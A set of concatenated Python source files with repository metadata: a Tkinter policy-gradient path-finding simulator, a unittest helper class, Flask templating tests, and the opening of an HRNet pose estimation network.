        self.current_state_x = self.start_state_x
        self.current_state_y = self.start_state_y
        self.update_position()
        self.w.coords(self.agent, self.px-11, self.py-11,self.px+11, self.py+11)

    # make the robot move with the given action both states and in the visual window
    def agentmove(self, action):
        """Apply an action (0=W, 1=N, 2=E, 3=S); moves off the grid are no-ops."""
        # declare two moving distance variables (pixels)
        delta_x = 0
        delta_y = 0
        if (action == 0):  # move to West
            if (self.current_state_x == 0):
                k =1#print("Cannot move WEST, agent is on the left edge")
            else:
                self.current_state_x += -1
                delta_x = -45
        if (action == 1):  # move to the North
            if (self.current_state_y == 0):
                k =1#print("Cannot move NORTH, agent is on the top edge")
            else:
                self.current_state_y += -1
                delta_y = -45
        if (action == 2):  # move to the East
            if (self.current_state_x == (map_dimension-1)):
                k =1#print("Cannot move EAST, agent is on the right edge")
            else:
                self.current_state_x += 1
                delta_x = 45
        if (action == 3):  # move to the South
            if (self.current_state_y == (map_dimension-1)):
                k =1#print("Cannot move SOUTH, agent is on the down edge")
            else:
                self.current_state_y += 1
                delta_y = 45
        # update a new postion in pixel for the agent: self.pos_x and self.pos_y
        self.update_position()
        # move the robot visually distances: delta_x, delta_y
        self.w.move(self.agent, delta_x, delta_y)
        self.w.update()
        #self.w.after(30, self.Robot_move)

    def FSR_function(self, state_x, state_y, action):
        """Return the sparse binary feature vector phi(s, a).

        Two bits are set per (state, action): one indexed by the y
        coordinate, one by the x coordinate, each within the 20-slot
        segment belonging to the chosen action.
        """
        # initialize feature vector - phi_BF
        phi_BF = np.zeros(theta_leng)  # Basis Function
        # action has four values: 0 -> left, 1 -> up, 2 -> right, 3 -> down
        phi_BF[action*20 + state_y] = 1
        #phi_BF[action*20] = 1
        #phi_BF[state_y] = 1
        phi_BF[action*20 + 10 + state_x] = 1  # x bit lives in the second half of the segment
        return phi_BF

    def policy_calculate(self, state_x, state_y):
        """Return the softmax action probabilities at (state_x, state_y)."""
        # probability values for the four actions
        policy = [0.0, 0.0, 0.0, 0.0]
        # parameterized numerical preferences h(s, a, theta)
        h = [0.0, 0.0, 0.0, 0.0]
        for i in range(numberofaction):
            # invoke the FSR_function for action i
            fsr = self.FSR_function(state_x, state_y, i)
            # h[i] = exp(phi(s,i) . theta)
            k = 0.0
            for j in range(theta_leng):
                k += fsr[j]*theta[j]
            h[i] = math.exp(k)
        # sum_h normalizes the preferences into a distribution
        sum_h = h[0] + h[1] + h[2] + h[3]
        for i in range(numberofaction):
            fsr = self.FSR_function(state_x, state_y, i)
            policy[i] = round(h[i]/sum_h, 3)
        return policy

    def si_function(self, state_x, state_y, action):  # score function
        """Return the score (eligibility) vector: phi(s,a) - E_pi[phi(s,.)].

        NOTE(review): the literal 80 below equals theta_leng (10*2*4); it
        would silently break if map_dimension changed — prefer theta_leng.
        """
        sum = np.zeros(80)
        fsr = np.zeros((4, 80))
        si = np.zeros(80)
        # invoke the policy value - this is a vector with four elements
        pi_value = self.policy_calculate(state_x, state_y)
        # expected feature vector under the current policy
        for i in range(numberofaction):
            # this is a vector for action i
            fsr1 = self.FSR_function(state_x, state_y, i)
            for j in range(theta_leng):
                fsr[i][j] = fsr1[j]*pi_value[i]
        for i in range(theta_leng):
            sum[i] = fsr[0][i] + fsr[1][i]+fsr[2][i]+fsr[3][i]
        # phi function for the action actually taken
        fsr2 = self.FSR_function(state_x, state_y, action)
        # score function - si
        for i in range(theta_leng):
            si[i] = fsr2[i] - sum[i]
        return si

    # update theta vector values
    def theta_update(self, state_x, state_y, action, returns):
        """REINFORCE update: theta += alpha * gama * G * score(s, a).

        The terminal step (returns == des_return) is skipped.
        """
        if (returns == des_return):
            k = 1
        else:
            # this task will update all elements of theta vector in one time
            score = self.si_function(state_x, state_y, action)
            for i in range(theta_leng):
                # update each element of theta vector
                theta[i] += alpha*gama*returns*score[i]

    def agent_onejourney(self):
        """Run one episode from the start state to the terminal state.

        Samples actions from the current softmax policy, records the
        (state, action, reward) trajectory, then walks it backwards to
        compute discounted returns G and update theta at every step.
        Returns the trajectory annotated with returns, in forward order.
        """
        action = random.randint(0,3)
        state_x, state_y = self.current_state()
        states_actions_rewards = [(state_x, state_y, action, 0)]
        # count number of step
        stepnumber = 0
        # start the journey
        while True:
            if (self.is_terminal()):
                action1 = 4  # sentinel "action" marking the terminal entry
                states_actions_rewards.append((state_x, state_y, action1, 0.0))
                print(" The agent has reached terminal state")
                break
            else:
                # sample the next action from the softmax policy
                policy = self.policy_calculate(state_x, state_y)
                threshold1 = policy[0]
                threshold2 = policy[0] + policy[1]
                threshold3 = threshold2 + policy[2]
                # just choose a random float number
                take_action = random.random()
                if (take_action < threshold1):
                    action = 0
                elif ((take_action >= threshold1)&(take_action < threshold2)):
                    action = 1
                elif ((take_action >= threshold2)&(take_action < threshold3)):
                    action = 2
                else:
                    action = 3
                states_actions_rewards.append((state_x, state_y, action, reward))
                # make the move
                self.agentmove(action)
                state_x, state_y = self.current_state()
                stepnumber += 1
                time.sleep(0.1)
        print("In this episode, number of step is: ", stepnumber)
        # calculate the returns by working backwards form the terminal state the update the theta vector
        G = des_return
        states_actions_returns = []
        first = True
        for state_x1, state_y1, a, r in reversed(states_actions_rewards):
            # save the value of state to a set of states to terminal state
            states_actions_returns.append((state_x1, state_y1, a, G))
            # update theta vector values
            self.theta_update(state_x1, state_y1, a, G)
            # discounted return for the preceding step
            G = r + gama*G
        states_actions_returns.reverse()
        return states_actions_returns

    # return the current state of the agent
    def current_state(self):
        return self.current_state_x, self.current_state_y

    # update the current position of the agent (grid cell -> pixels)
    def update_position(self):
        self.px = self.current_state_x*45 + 43
        self.py = self.current_state_y*45 + 43

    def is_terminal(self):
        # True when the agent's cell equals the destination cell.
        if ((self.current_state_x == self.dest_x)&(self.current_state_y == self.dest_y)):
            return True
        else:
            return False

    def learning_loop(self):
        """Run NOE episodes, then display the learned greedy path."""
        for i in range(NOE):
            print("Episode number: ", i+1)
            # generate an episode using pi
            new_states_actions_returns = self.agent_onejourney()
            # reset to begin the second episode
            self.reset()
        print("The learning process is DONE")
        # the result after learning
        self.optimum_path()

    # After learning, this task will show the optimum path for robot to move to destination
    def optimum_path(self):
        """Greedily follow the highest-preference action to the destination."""
        optimumagentpath = []
        # move the agent back to starting position
        self.reset()
        # get the current state
        state_x1, state_y1 = self.current_state()
        # find the best path by determinical manner
        while True:
            if (self.is_terminal()):
                # just add the destination state into the array
                optimumagentpath.append((state_x1, state_y1))
                break
            else:
                optimumagentpath.append((state_x1, state_y1))
                # preference value of each action in the current state
                action_value = [0.0, 0.0, 0.0, 0.0]
                for i in range(numberofaction):
                    fsr = self.FSR_function(state_x1, state_y1, i)
                    for j in range(theta_leng):
                        action_value[i] += fsr[j]*theta[j]
                # select the action with highest probability
                action_max = action_value[0]
                action_select = 0
                for i in range(numberofaction):
                    if (action_max < action_value[i]):
                        action_max = action_value[i]
                        action_select = i
                # update the new state of agent and visualize it
                self.agentmove(action_select)
                # update new state
                state_x1, state_y1 = self.current_state()
        print("The optimal Path is: ")
        print(optimumagentpath)
def initialize_policy():
    """Start every weight of the global theta vector at 0.5."""
    theta[:] = 0.5
#a = np.zeros(10)
# initialize a policy to go????\
# Module-level registries populated by the __main__ block below.
agentteam = [] # list of agent
obstables = [] # list of obstacles
if __name__ == "__main__":
    # --------------------------INITIALIZE ALL VALUES OF:...............................#
    initialize_policy()
    fenster = Tk()  # create the main window
    fenster.title("Policy Based Monte Carlo ALgorithm - Path Finding Simulator")
    #fenster.iconbitmap('icon.ico')
    #fenster.iconbitmap('/home/bui/Dropbox/PhD_Projects/Projects/References/Simulation/icon.ico')
    icon = PhotoImage(file="icon.gif")
    fenster.tk.call('wm','iconphoto',fenster._w, icon)
    # use Canvas use to display, edit and update graphs and other drawings
    w = Canvas(fenster, width = 1000, height = 950)
    w.pack()

    Obstacle_number = 0
    Obstacle_cell_Pos = [6,8, 8,10, 10,7, 12,9]
    # create the destination - an array of integer value
    des_state = np.zeros(2).astype(int)
    des_state[0] = random.randint(0,map_dimension-1)
    des_state[1] = random.randint(0,map_dimension-1)
    Simulator_map = Create_map(w, Obstacle_number, Obstacle_cell_Pos, des_state[0], des_state[1], map_dimension)

    # create obstables
    for i in range(Obstacle_number):
        dx1, dx2, dy1, dy2 = Simulator_map.Convert_to_Ob_Coor(Obstacle_cell_Pos[2*i],Obstacle_cell_Pos[2*i+1])
        Obst1 = [dx1, dx2, dy1, dy2]  # obstacle coordinate: x_left,x_right,y_up,y_down
        # FIX: the original appended to an undefined name `Obst`, which would
        # raise NameError as soon as Obstacle_number > 0; the declared
        # module-level list is `obstables`.
        obstables.append(Obst1)

    agent_number = 1  # define the number of agent
    # setup initial states
    init_state = np.zeros((agent_number, 2)).astype(object)
    init_state[:,:] = init_state[:,:].astype(int)
    # Create the robot initial states
    for i in range(agent_number):
        # x state
        init_state[i][0] = random.randint(0,map_dimension-1)
        # y state
        init_state[i][1] = random.randint(0,map_dimension-1)

    color = ['green','blue','yellow','orange','violet', 'pink']
    for i in range(agent_number):
        agent1 = agent(i+1, init_state[i][0], init_state[i][1], des_state[0], des_state[1], color[i], w)
        agentteam.append(agent1)
    # start one learning thread per agent, then hand control to Tk
    for i in range(agent_number):
        agentteam[i].start()
    fenster.mainloop()
| 34.085586
| 112
| 0.570636
|
4a0ebdb31a6b5bc75ed6afec3058c821dbb713c1
| 1,756
|
py
|
Python
|
gw_bot/helpers/Test_Helper.py
|
atykhonov/GW-Bot
|
fb1d8584f229efe703f05aa0e44fa0924b90ca1d
|
[
"Apache-2.0"
] | null | null | null |
gw_bot/helpers/Test_Helper.py
|
atykhonov/GW-Bot
|
fb1d8584f229efe703f05aa0e44fa0924b90ca1d
|
[
"Apache-2.0"
] | null | null | null |
gw_bot/helpers/Test_Helper.py
|
atykhonov/GW-Bot
|
fb1d8584f229efe703f05aa0e44fa0924b90ca1d
|
[
"Apache-2.0"
] | null | null | null |
import base64
from unittest import TestCase
from pbx_gs_python_utils.utils.Dev import Dev
from gw_bot.setup.OSS_Setup import OSS_Setup
class Test_Helper(TestCase):
    """Base TestCase that wires up an OSS_Setup fixture and reports results.

    Subclasses may assign self.result and/or self.png_data during a test;
    tearDown pretty-prints the result and decodes a base64 PNG payload to
    /tmp/lambda_png_file.png.
    """

    def setUp(self) -> OSS_Setup:
        # Default fixture: no explicit profile/account/region.
        return self.oss_setup()

    def oss_setup(self,profile_name = None, account_id=None, region=None) -> OSS_Setup:
        """Reset per-test state and return a fresh OSS_Setup."""
        self.result = None
        self.png_data = None
        self.png_file = '/tmp/lambda_png_file.png'
        return OSS_Setup(profile_name=profile_name,account_id=account_id,region_name=region)#.setup_test_environment()

    def tearDown(self):
        # Print whatever the test produced; decode PNG data if present.
        if self.result is not None:
            Dev.pprint(self.result)
        if self.png_data is not None:
            if type(self.png_data) is not str:
                Dev.pprint(f'Png data was not a string: {self.png_data}')
            else:
                try:
                    # png_data is expected to be base64-encoded image bytes.
                    with open(self.png_file, "wb") as fh:
                        fh.write(base64.decodebytes(self.png_data.encode()))
                    Dev.pprint(f'Png data with size {len(self.png_data)} saved to {self.png_file}')
                except Exception as error:
                    # Best-effort: report the failure and dump the raw data.
                    Dev.pprint(f'png save error: {error}')
                    Dev.pprint(self.png_data)

    def lambda_package(self, lambda_name, profile_name = None, account_id=None, region=None):
        """Build an OSS_Setup and return the named lambda's package."""
        return self.oss_setup(profile_name=profile_name,account_id=account_id,region=region).lambda_package(lambda_name)

    @staticmethod
    def print(result):
        # Convenience wrapper: pretty-print unless result is None.
        if result is not None:
            Dev.pprint(result)

    @staticmethod
    def save_png(png_data, target_file):
        """Decode base64 *png_data* and write it to *target_file*."""
        if png_data is not None:
            with open(target_file, "wb") as fh:
                fh.write(base64.decodebytes(png_data.encode()))
| 35.836735
| 120
| 0.632688
|
4a0ebdbccdc379110607d08feb0208ba8c359faa
| 7,129
|
py
|
Python
|
flask/testsuite/templating.py
|
Khan/flask
|
e78e2a1641e5b7ad538d93154ee59445f4d4eaf7
|
[
"BSD-3-Clause"
] | 5
|
2015-01-18T01:47:56.000Z
|
2016-01-30T14:58:58.000Z
|
flask/testsuite/templating.py
|
Khan/flask
|
e78e2a1641e5b7ad538d93154ee59445f4d4eaf7
|
[
"BSD-3-Clause"
] | 6
|
2018-06-21T19:45:01.000Z
|
2018-06-21T19:45:02.000Z
|
flask/testsuite/templating.py
|
Khan/flask
|
e78e2a1641e5b7ad538d93154ee59445f4d4eaf7
|
[
"BSD-3-Clause"
] | 6
|
2018-07-14T04:58:02.000Z
|
2018-08-06T18:02:27.000Z
|
# -*- coding: utf-8 -*-
"""
flask.testsuite.templating
~~~~~~~~~~~~~~~~~~~~~~~~~~
Template functionality
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import flask
import unittest
from flask.testsuite import FlaskTestCase
class TemplatingTestCase(FlaskTestCase):
def test_context_processing(self):
app = flask.Flask(__name__)
@app.context_processor
def context_processor():
return {'injected_value': 42}
@app.route('/')
def index():
return flask.render_template('context_template.html', value=23)
rv = app.test_client().get('/')
self.assert_equal(rv.data, '<p>23|42')
def test_original_win(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template_string('{{ config }}', config=42)
rv = app.test_client().get('/')
self.assert_equal(rv.data, '42')
def test_standard_context(self):
app = flask.Flask(__name__)
app.secret_key = 'development key'
@app.route('/')
def index():
flask.g.foo = 23
flask.session['test'] = 'aha'
return flask.render_template_string('''
{{ request.args.foo }}
{{ g.foo }}
{{ config.DEBUG }}
{{ session.test }}
''')
rv = app.test_client().get('/?foo=42')
self.assert_equal(rv.data.split(), ['42', '23', 'False', 'aha'])
def test_escaping(self):
text = '<p>Hello World!'
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template('escaping_template.html', text=text,
html=flask.Markup(text))
lines = app.test_client().get('/').data.splitlines()
self.assert_equal(lines, [
'<p>Hello World!',
'<p>Hello World!',
'<p>Hello World!',
'<p>Hello World!',
'<p>Hello World!',
'<p>Hello World!'
])
def test_no_escaping(self):
app = flask.Flask(__name__)
with app.test_request_context():
self.assert_equal(flask.render_template_string('{{ foo }}',
foo='<test>'), '<test>')
self.assert_equal(flask.render_template('mail.txt', foo='<test>'),
'<test> Mail')
def test_macros(self):
app = flask.Flask(__name__)
with app.test_request_context():
macro = flask.get_template_attribute('_macro.html', 'hello')
self.assert_equal(macro('World'), 'Hello World!')
def test_template_filter(self):
app = flask.Flask(__name__)
@app.template_filter()
def my_reverse(s):
return s[::-1]
self.assert_('my_reverse' in app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['my_reverse'], my_reverse)
self.assert_equal(app.jinja_env.filters['my_reverse']('abcd'), 'dcba')
def test_add_template_filter(self):
app = flask.Flask(__name__)
def my_reverse(s):
return s[::-1]
app.add_template_filter(my_reverse)
self.assert_('my_reverse' in app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['my_reverse'], my_reverse)
self.assert_equal(app.jinja_env.filters['my_reverse']('abcd'), 'dcba')
def test_template_filter_with_name(self):
app = flask.Flask(__name__)
@app.template_filter('strrev')
def my_reverse(s):
return s[::-1]
self.assert_('strrev' in app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['strrev'], my_reverse)
self.assert_equal(app.jinja_env.filters['strrev']('abcd'), 'dcba')
def test_add_template_filter_with_name(self):
app = flask.Flask(__name__)
def my_reverse(s):
return s[::-1]
app.add_template_filter(my_reverse, 'strrev')
self.assert_('strrev' in app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['strrev'], my_reverse)
self.assert_equal(app.jinja_env.filters['strrev']('abcd'), 'dcba')
def test_template_filter_with_template(self):
    """A decorator-registered filter is usable from a rendered template."""
    app = flask.Flask(__name__)

    @app.template_filter()
    def super_reverse(s):
        return s[::-1]

    @app.route('/')
    def index():
        return flask.render_template('template_filter.html', value='abcd')

    response = app.test_client().get('/')
    self.assert_equal(response.data, 'dcba')
def test_add_template_filter_with_template(self):
    """An add_template_filter-registered filter works from a template."""
    app = flask.Flask(__name__)

    def super_reverse(s):
        return s[::-1]

    app.add_template_filter(super_reverse)

    @app.route('/')
    def index():
        return flask.render_template('template_filter.html', value='abcd')

    response = app.test_client().get('/')
    self.assert_equal(response.data, 'dcba')
def test_template_filter_with_name_and_template(self):
    """A filter registered under an explicit name works from a template."""
    app = flask.Flask(__name__)

    @app.template_filter('super_reverse')
    def my_reverse(s):
        return s[::-1]

    @app.route('/')
    def index():
        return flask.render_template('template_filter.html', value='abcd')

    response = app.test_client().get('/')
    self.assert_equal(response.data, 'dcba')
def test_add_template_filter_with_name_and_template(self):
    """add_template_filter with an explicit name works from a template."""
    app = flask.Flask(__name__)

    def my_reverse(s):
        return s[::-1]

    app.add_template_filter(my_reverse, 'super_reverse')

    @app.route('/')
    def index():
        return flask.render_template('template_filter.html', value='abcd')

    response = app.test_client().get('/')
    self.assert_equal(response.data, 'dcba')
def test_custom_template_loader(self):
    """Subclasses may swap in their own global Jinja loader."""
    class MyFlask(flask.Flask):
        def create_global_jinja_loader(self):
            from jinja2 import DictLoader
            return DictLoader({'index.html': 'Hello Custom World!'})

    app = MyFlask(__name__)

    @app.route('/')
    def index():
        return flask.render_template('index.html')

    response = app.test_client().get('/')
    self.assert_equal(response.data, 'Hello Custom World!')
def test_iterable_loader(self):
    """render_template accepts a name list and renders the first that exists."""
    app = flask.Flask(__name__)

    @app.context_processor
    def context_processor():
        return {'whiskey': 'Jameson'}

    @app.route('/')
    def index():
        return flask.render_template(
            ['no_template.xml',  # should skip this one
             'simple_template.html',  # should render this
             'context_template.html'],
            value=23)

    response = app.test_client().get('/')
    self.assert_equal(response.data, '<h1>Jameson</h1>')
def suite():
    """Build the unittest suite for this module."""
    tests = unittest.TestSuite()
    tests.addTest(unittest.makeSuite(TemplatingTestCase))
    return tests
| 34.946078
| 78
| 0.580025
|
4a0ebe3f4750565be9f1fd05a93536bbf178192e
| 18,030
|
py
|
Python
|
src/pose_estimator/model_hrnet.py
|
Liang813/GaitGraph
|
df8cfd8d1e7a91a738190ba68bc52a67207188e5
|
[
"MIT"
] | 57
|
2021-01-14T12:45:04.000Z
|
2022-03-22T08:57:26.000Z
|
src/pose_estimator/model_hrnet.py
|
KennChow/GaitGraph
|
749aa32ce079f0afaa39b15a90c8f1664f864436
|
[
"MIT"
] | 18
|
2021-02-07T07:37:08.000Z
|
2022-03-22T11:17:11.000Z
|
src/pose_estimator/model_hrnet.py
|
KennChow/GaitGraph
|
749aa32ce079f0afaa39b15a90c8f1664f864436
|
[
"MIT"
] | 18
|
2021-03-13T11:15:04.000Z
|
2022-03-28T05:10:34.000Z
|
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao (Bin.Xiao@microsoft.com)
# ------------------------------------------------------------------------------
import os
import logging
import torch
import torch.nn as nn
BN_MOMENTUM = 0.1
logger = logging.getLogger(__name__)
def conv3x3(in_planes, out_planes, stride=1):
    """Return a bias-free 3x3 convolution with padding 1."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
class BasicBlock(nn.Module):
    """Residual block: two 3x3 convs with BN/ReLU plus a skip connection.

    The optional `downsample` module projects the input so the addition
    matches the main path's shape.
    """

    expansion = 1  # output channels = planes * expansion

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BasicBlock, self).__init__()
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        identity = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        out += identity
        return self.relu(out)
class Bottleneck(nn.Module):
    """Residual bottleneck: 1x1 reduce -> 3x3 -> 1x1 expand, with a skip.

    Output width is planes * 4; `downsample` projects the input when the
    shapes of skip and main path differ.
    """

    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(Bottleneck, self).__init__()
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.conv2 = nn.Conv2d(
            planes, planes, kernel_size=3, stride=stride, padding=1,
            bias=False)
        self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.conv3 = nn.Conv2d(
            planes, planes * self.expansion, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(
            planes * self.expansion, momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        identity = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        out += identity
        return self.relu(out)
class HighResolutionModule(nn.Module):
    """One HRNet stage module: parallel branches at different resolutions
    whose outputs are fused (summed across resolutions) at the end.

    Branch i runs `num_blocks[i]` residual blocks of type `blocks` on
    feature maps of width `num_channels[i]` (times the block's expansion).
    """

    def __init__(self, num_branches, blocks, num_blocks, num_inchannels,
                 num_channels, fuse_method, multi_scale_output=True):
        super(HighResolutionModule, self).__init__()
        # Fail fast on inconsistent per-branch configuration lists.
        self._check_branches(
            num_branches, blocks, num_blocks, num_inchannels, num_channels)

        self.num_inchannels = num_inchannels
        self.fuse_method = fuse_method
        self.num_branches = num_branches

        # When False, only the highest-resolution output is produced.
        self.multi_scale_output = multi_scale_output

        self.branches = self._make_branches(
            num_branches, blocks, num_blocks, num_channels)
        self.fuse_layers = self._make_fuse_layers()
        self.relu = nn.ReLU(True)

    def _check_branches(self, num_branches, blocks, num_blocks,
                        num_inchannels, num_channels):
        """Raise ValueError if any config list disagrees with num_branches."""
        if num_branches != len(num_blocks):
            error_msg = 'NUM_BRANCHES({}) <> NUM_BLOCKS({})'.format(
                num_branches, len(num_blocks))
            logger.error(error_msg)
            raise ValueError(error_msg)

        if num_branches != len(num_channels):
            error_msg = 'NUM_BRANCHES({}) <> NUM_CHANNELS({})'.format(
                num_branches, len(num_channels))
            logger.error(error_msg)
            raise ValueError(error_msg)

        if num_branches != len(num_inchannels):
            error_msg = 'NUM_BRANCHES({}) <> NUM_INCHANNELS({})'.format(
                num_branches, len(num_inchannels))
            logger.error(error_msg)
            raise ValueError(error_msg)

    def _make_one_branch(self, branch_index, block, num_blocks, num_channels,
                         stride=1):
        """Build the residual-block stack for a single branch."""
        downsample = None
        # A 1x1 projection is needed when stride or channel width changes.
        if stride != 1 or \
                self.num_inchannels[branch_index] != num_channels[branch_index] * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(
                    self.num_inchannels[branch_index],
                    num_channels[branch_index] * block.expansion,
                    kernel_size=1, stride=stride, bias=False
                ),
                nn.BatchNorm2d(
                    num_channels[branch_index] * block.expansion,
                    momentum=BN_MOMENTUM
                ),
            )

        layers = []
        layers.append(
            block(
                self.num_inchannels[branch_index],
                num_channels[branch_index],
                stride,
                downsample
            )
        )
        # Record the branch's output width; the fuse layers built later
        # (and the next stage) read it back via get_num_inchannels().
        self.num_inchannels[branch_index] = \
            num_channels[branch_index] * block.expansion
        for i in range(1, num_blocks[branch_index]):
            layers.append(
                block(
                    self.num_inchannels[branch_index],
                    num_channels[branch_index]
                )
            )

        return nn.Sequential(*layers)

    def _make_branches(self, num_branches, block, num_blocks, num_channels):
        """Build all parallel branches as a ModuleList."""
        branches = []

        for i in range(num_branches):
            branches.append(
                self._make_one_branch(i, block, num_blocks, num_channels)
            )

        return nn.ModuleList(branches)

    def _make_fuse_layers(self):
        """Build fuse_layers[i][j]: maps branch j's output to branch i's
        resolution and width (1x1 conv + upsample for j > i, a chain of
        stride-2 3x3 convs for j < i, None for the identity j == i)."""
        if self.num_branches == 1:
            return None

        num_branches = self.num_branches
        num_inchannels = self.num_inchannels
        fuse_layers = []
        for i in range(num_branches if self.multi_scale_output else 1):
            fuse_layer = []
            for j in range(num_branches):
                if j > i:
                    # Lower resolution -> adapt width, then nearest upsample.
                    fuse_layer.append(
                        nn.Sequential(
                            nn.Conv2d(
                                num_inchannels[j],
                                num_inchannels[i],
                                1, 1, 0, bias=False
                            ),
                            nn.BatchNorm2d(num_inchannels[i]),
                            nn.Upsample(scale_factor=2**(j-i), mode='nearest')
                        )
                    )
                elif j == i:
                    # Identity; handled directly in forward().
                    fuse_layer.append(None)
                else:
                    # Higher resolution -> downsample with stride-2 convs;
                    # only the final conv changes the channel count.
                    conv3x3s = []
                    for k in range(i-j):
                        if k == i - j - 1:
                            num_outchannels_conv3x3 = num_inchannels[i]
                            conv3x3s.append(
                                nn.Sequential(
                                    nn.Conv2d(
                                        num_inchannels[j],
                                        num_outchannels_conv3x3,
                                        3, 2, 1, bias=False
                                    ),
                                    nn.BatchNorm2d(num_outchannels_conv3x3)
                                )
                            )
                        else:
                            num_outchannels_conv3x3 = num_inchannels[j]
                            conv3x3s.append(
                                nn.Sequential(
                                    nn.Conv2d(
                                        num_inchannels[j],
                                        num_outchannels_conv3x3,
                                        3, 2, 1, bias=False
                                    ),
                                    nn.BatchNorm2d(num_outchannels_conv3x3),
                                    nn.ReLU(True)
                                )
                            )
                    fuse_layer.append(nn.Sequential(*conv3x3s))
            fuse_layers.append(nn.ModuleList(fuse_layer))

        return nn.ModuleList(fuse_layers)

    def get_num_inchannels(self):
        # Per-branch output widths (after block expansion); used to chain
        # this module into the next one.
        return self.num_inchannels

    def forward(self, x):
        """x: list of per-branch tensors -> list of fused per-branch tensors."""
        if self.num_branches == 1:
            return [self.branches[0](x[0])]

        for i in range(self.num_branches):
            x[i] = self.branches[i](x[i])

        x_fuse = []

        for i in range(len(self.fuse_layers)):
            # Sum every branch's contribution at branch i's resolution.
            y = x[0] if i == 0 else self.fuse_layers[i][0](x[0])
            for j in range(1, self.num_branches):
                if i == j:
                    y = y + x[j]
                else:
                    y = y + self.fuse_layers[i][j](x[j])
            x_fuse.append(self.relu(y))

        return x_fuse
# Maps the config's BLOCK name to the residual block class used per stage.
blocks_dict = {
    'BASIC': BasicBlock,
    'BOTTLENECK': Bottleneck
}
class PoseHighResolutionNet(nn.Module):
    """HRNet pose estimator: stem -> layer1 -> three multi-branch stages ->
    conv head producing one heatmap per joint.

    `cfg['MODEL']['EXTRA']` supplies the STAGE2..STAGE4 layouts, the final
    conv kernel size, and the layer names eligible for pretrained loading.
    """

    def __init__(self, cfg, **kwargs):
        self.inplanes = 64
        extra = cfg['MODEL']['EXTRA']
        super(PoseHighResolutionNet, self).__init__()

        # Stem net: two stride-2 3x3 convs bring the input to 1/4 resolution.
        self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=2, padding=1,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
        self.conv2 = nn.Conv2d(64, 64, kernel_size=3, stride=2, padding=1,
                               bias=False)
        self.bn2 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        self.layer1 = self._make_layer(Bottleneck, 64, 4)

        # Stage 2: split into parallel resolution branches.
        self.stage2_cfg = extra['STAGE2']
        num_channels = self.stage2_cfg['NUM_CHANNELS']
        block = blocks_dict[self.stage2_cfg['BLOCK']]
        num_channels = [
            num_channels[i] * block.expansion for i in range(len(num_channels))
        ]
        # layer1 ends in Bottleneck (expansion 4) -> 256 channels.
        self.transition1 = self._make_transition_layer([256], num_channels)
        self.stage2, pre_stage_channels = self._make_stage(
            self.stage2_cfg, num_channels)

        # Stage 3.
        self.stage3_cfg = extra['STAGE3']
        num_channels = self.stage3_cfg['NUM_CHANNELS']
        block = blocks_dict[self.stage3_cfg['BLOCK']]
        num_channels = [
            num_channels[i] * block.expansion for i in range(len(num_channels))
        ]
        self.transition2 = self._make_transition_layer(
            pre_stage_channels, num_channels)
        self.stage3, pre_stage_channels = self._make_stage(
            self.stage3_cfg, num_channels)

        # Stage 4: only the highest-resolution output feeds the head.
        self.stage4_cfg = extra['STAGE4']
        num_channels = self.stage4_cfg['NUM_CHANNELS']
        block = blocks_dict[self.stage4_cfg['BLOCK']]
        num_channels = [
            num_channels[i] * block.expansion for i in range(len(num_channels))
        ]
        self.transition3 = self._make_transition_layer(
            pre_stage_channels, num_channels)
        self.stage4, pre_stage_channels = self._make_stage(
            self.stage4_cfg, num_channels, multi_scale_output=False)

        # Head: one output channel (heatmap) per joint.
        self.final_layer = nn.Conv2d(
            in_channels=pre_stage_channels[0],
            out_channels=cfg['MODEL']['NUM_JOINTS'],
            kernel_size=extra['FINAL_CONV_KERNEL'],
            stride=1,
            padding=1 if extra['FINAL_CONV_KERNEL'] == 3 else 0
        )

        self.pretrained_layers = extra['PRETRAINED_LAYERS']

    def _make_transition_layer(
            self, num_channels_pre_layer, num_channels_cur_layer):
        """Build per-branch adapters between consecutive stages.

        Existing branches get a 3x3 conv only when their width changes
        (None means identity); each new, lower-resolution branch is derived
        from the previous stage's last branch via stride-2 3x3 convs.
        """
        num_branches_cur = len(num_channels_cur_layer)
        num_branches_pre = len(num_channels_pre_layer)

        transition_layers = []
        for i in range(num_branches_cur):
            if i < num_branches_pre:
                if num_channels_cur_layer[i] != num_channels_pre_layer[i]:
                    transition_layers.append(
                        nn.Sequential(
                            nn.Conv2d(
                                num_channels_pre_layer[i],
                                num_channels_cur_layer[i],
                                3, 1, 1, bias=False
                            ),
                            nn.BatchNorm2d(num_channels_cur_layer[i]),
